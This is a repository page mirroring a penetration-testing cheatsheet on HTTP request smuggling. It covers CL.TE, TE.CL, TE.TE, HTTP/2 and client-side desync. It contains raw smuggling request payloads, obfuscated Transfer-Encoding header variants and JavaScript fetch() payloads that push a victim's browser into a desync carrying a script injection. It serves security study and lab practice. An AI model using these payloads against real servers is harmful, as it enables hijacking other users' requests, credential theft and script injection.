daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

index.md (8438B)


      1 ---
      2 title: "Request Smuggling"
      3 topic: "Request Smuggling"
      4 topicSlug: "request-smuggling"
      5 sourcePath: "Request Smuggling/README.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/Request%20Smuggling/README.md"
      7 sha: "3ac27901c711"
      8 isReadme: true
      9 ---
     10 
     11 # Request Smuggling
     12 
     13 > HTTP Request smuggling occurs when multiple "things" process a request, but differ on how they determine where the request starts/ends. This disagreement can be used to interfere with another user's request/response or to bypass security controls. It normally occurs due to prioritising different HTTP headers (Content-Length vs Transfer-Encoding), differences in handling malformed headers (eg whether to ignore headers with unexpected whitespace), due to downgrading requests from a newer protocol, or due to differences in when a partial request has timed out and should be discarded.
     14 
     15 ## Summary
     16 
     17 * [Tools](#tools)
     18 * [Methodology](#methodology)
     19     * [CL.TE Vulnerabilities](#clte-vulnerabilities)
     20     * [TE.CL Vulnerabilities](#tecl-vulnerabilities)
     21     * [TE.TE Vulnerabilities](#tete-vulnerabilities)
     22     * [HTTP/2 Request Smuggling](#http2-request-smuggling)
     23     * [Client-Side Desync](#client-side-desync)
     24 * [Labs](#labs)
     25 * [References](#references)
     26 
     27 ## Tools
     28 
     29 * [bappstore/HTTP Request Smuggler](https://portswigger.net/bappstore/aaaa60ef945341e8a450217a54a11646) - An extension for Burp Suite designed to help you launch HTTP Request Smuggling attacks
     30 * [defparam/Smuggler](https://github.com/defparam/smuggler) - An HTTP Request Smuggling / Desync testing tool written in Python 3
     31 * [dhmosfunk/simple-http-smuggler-generator](https://github.com/dhmosfunk/simple-http-smuggler-generator) - This tool is developed for burp suite practitioner certificate exam and HTTP Request Smuggling labs.
     32 
     33 ## Methodology
     34 
     35 If you want to exploit HTTP Requests Smuggling manually you will face some problems especially in TE.CL vulnerability you have to calculate the chunk size for the second request(malicious request) as PortSwigger suggests `Manually fixing the length fields in request smuggling attacks can be tricky.`.
     36 
     37 ### CL.TE Vulnerabilities
     38 
     39 > The front-end server uses the Content-Length header and the back-end server uses the Transfer-Encoding header.
     40 
     41 ```powershell
     42 POST / HTTP/1.1
     43 Host: vulnerable-website.com
     44 Content-Length: 13
     45 Transfer-Encoding: chunked
     46 
     47 0
     48 
     49 SMUGGLED
     50 ```
     51 
     52 Example:
     53 
     54 ```powershell
     55 POST / HTTP/1.1
     56 Host: domain.example.com
     57 Connection: keep-alive
     58 Content-Type: application/x-www-form-urlencoded
     59 Content-Length: 6
     60 Transfer-Encoding: chunked
     61 
     62 0
     63 
     64 G
     65 ```
     66 
     67 ### TE.CL Vulnerabilities
     68 
     69 > The front-end server uses the Transfer-Encoding header and the back-end server uses the Content-Length header.
     70 
     71 ```powershell
     72 POST / HTTP/1.1
     73 Host: vulnerable-website.com
     74 Content-Length: 3
     75 Transfer-Encoding: chunked
     76 
     77 8
     78 SMUGGLED
     79 0
     80 ```
     81 
     82 Example:
     83 
     84 ```powershell
     85 POST / HTTP/1.1
     86 Host: domain.example.com
     87 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86
     88 Content-Length: 4
     89 Connection: close
     90 Content-Type: application/x-www-form-urlencoded
     91 Accept-Encoding: gzip, deflate
     92 
     93 5c
     94 GPOST / HTTP/1.1
     95 Content-Type: application/x-www-form-urlencoded
     96 Content-Length: 15
     97 x=1
     98 0
     99 
    100 
    101 ```
    102 
    103 :warning: To send this request using Burp Repeater, you will first need to go to the Repeater menu and ensure that the "Update Content-Length" option is unchecked.You need to include the trailing sequence `\r\n\r\n` following the final 0.
    104 
    105 ### TE.TE Vulnerabilities
    106 
    107 > The front-end and back-end servers both support the Transfer-Encoding header, but one of the servers can be induced not to process it by obfuscating the header in some way.
    108 
    109 ```powershell
    110 Transfer-Encoding: xchunked
    111 Transfer-Encoding : chunked
    112 Transfer-Encoding: chunked
    113 Transfer-Encoding: x
    114 Transfer-Encoding:[tab]chunked
    115 [space]Transfer-Encoding: chunked
    116 X: X[\n]Transfer-Encoding: chunked
    117 Transfer-Encoding
    118 : chunked
    119 ```
    120 
    121 ## HTTP/2 Request Smuggling
    122 
    123 HTTP/2 request smuggling can occur if a machine converts your HTTP/2 request to HTTP/1.1, and you can smuggle an invalid content-length header, transfer-encoding header or new lines (CRLF) into the translated request. HTTP/2 request smuggling can also occur in a GET request, if you can hide an HTTP/1.1 request inside an HTTP/2 header
    124 
    125 ```ps1
    126 :method GET
    127 :path /
    128 :authority www.example.com
    129 header ignored\r\n\r\nGET / HTTP/1.1\r\nHost: www.example.com
    130 ```
    131 
    132 ## Client-Side Desync
    133 
    134 On some paths, servers don't expect POST requests, and will treat them as simple GET requests, ignoring the payload, eg:
    135 
    136 ```ps1
    137 POST / HTTP/1.1
    138 Host: www.example.com
    139 Content-Length: 37
    140 
    141 GET / HTTP/1.1
    142 Host: www.example.com
    143 ```
    144 
    145 could be treated as two requests when it should only be one. When the backend server responds twice, the frontend server will assume only the first response is related to this request.
    146 
    147 To exploit this, an attacker can use JavaScript to trigger their victim to send a POST to the vulnerable site:
    148 
    149 ```javascript
    150 fetch('https://www.example.com/', {method: 'POST', body: "GET / HTTP/1.1\r\nHost: www.example.com", mode: 'no-cors', credentials: 'include'} )
    151 ```
    152 
    153 This could be used to:
    154 
    155 * get the vulnerable site to store a victim's credentials somewhere the attacker can access it
    156 * get the victim to send an exploit to a site (eg for internal sites the attacker cannot access, or to make it harder to attribute the attack)
    157 * to get the victim to run arbitrary JavaScript as if it were from the site
    158 
    159 **Example**:
    160 
    161 ```javascript
    162 fetch('https://www.example.com/redirect', {
    163     method: 'POST',
    164         body: `HEAD /404/ HTTP/1.1\r\nHost: www.example.com\r\n\r\nGET /x?x=<script>alert(1)</script> HTTP/1.1\r\nX: Y`,
    165         credentials: 'include',
    166         mode: 'cors' // throw an error instead of following redirect
    167 }).catch(() => {
    168         location = 'https://www.example.com/'
    169 })
    170 ```
    171 
    172 This script tells the victim browser to send a `POST` request to `www.example.com/redirect`. That returns a redirect which is blocked by CORS, and causes the browser to execute the catch block, by going to `www.example.com`.
    173 
    174 `www.example.com` now incorrectly processes the `HEAD` request in the `POST`'s body, instead of the browser's `GET` request, and returns 404 not found with a content-length, before replying to the next misinterpreted third (`GET /x?x=<script>...`) request and finally the browser's actual `GET` request.
    175 Since the browser only sent one request, it accepts the response to the `HEAD` request as the response to its `GET` request and interprets the third and fourth responses as the body of the response, and thus executes the attacker's script.
    176 
    177 ## Labs
    178 
    179 * [PortSwigger - HTTP request smuggling, basic CL.TE vulnerability](https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te)
    180 * [PortSwigger - HTTP request smuggling, basic TE.CL vulnerability](https://portswigger.net/web-security/request-smuggling/lab-basic-te-cl)
    181 * [PortSwigger - HTTP request smuggling, obfuscating the TE header](https://portswigger.net/web-security/request-smuggling/lab-ofuscating-te-header)
    182 * [PortSwigger - Response queue poisoning via H2.TE request smuggling](https://portswigger.net/web-security/request-smuggling/advanced/response-queue-poisoning/lab-request-smuggling-h2-response-queue-poisoning-via-te-request-smuggling)
    183 * [PortSwigger - Client-side desync](https://portswigger.net/web-security/request-smuggling/browser/client-side-desync/lab-client-side-desync)
    184 
    185 ## References
    186 
    187 * [A Pentester's Guide to HTTP Request Smuggling - Busra Demir - October 16, 2020](https://web.archive.org/web/20260111201639/https://www.cobalt.io/blog/a-pentesters-guide-to-http-request-smuggling)
    188 * [Advanced Request Smuggling - PortSwigger - October 26, 2021](https://web.archive.org/web/20260228102047/https://portswigger.net/web-security/request-smuggling/advanced)
    189 * [Browser-Powered Desync Attacks: A New Frontier in HTTP Request Smuggling - James Kettle (@albinowax) - August 10, 2022](https://web.archive.org/web/20220810190719/https://portswigger.net/research/browser-powered-desync-attacks)
    190 * [HTTP Desync Attacks: Request Smuggling Reborn - James Kettle (@albinowax) - August 7, 2019](https://web.archive.org/web/20260228152820/https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn)
    191 * [Request Smuggling Tutorial - PortSwigger - September 28, 2019](https://web.archive.org/web/20190821011451/https://portswigger.net/web-security/request-smuggling)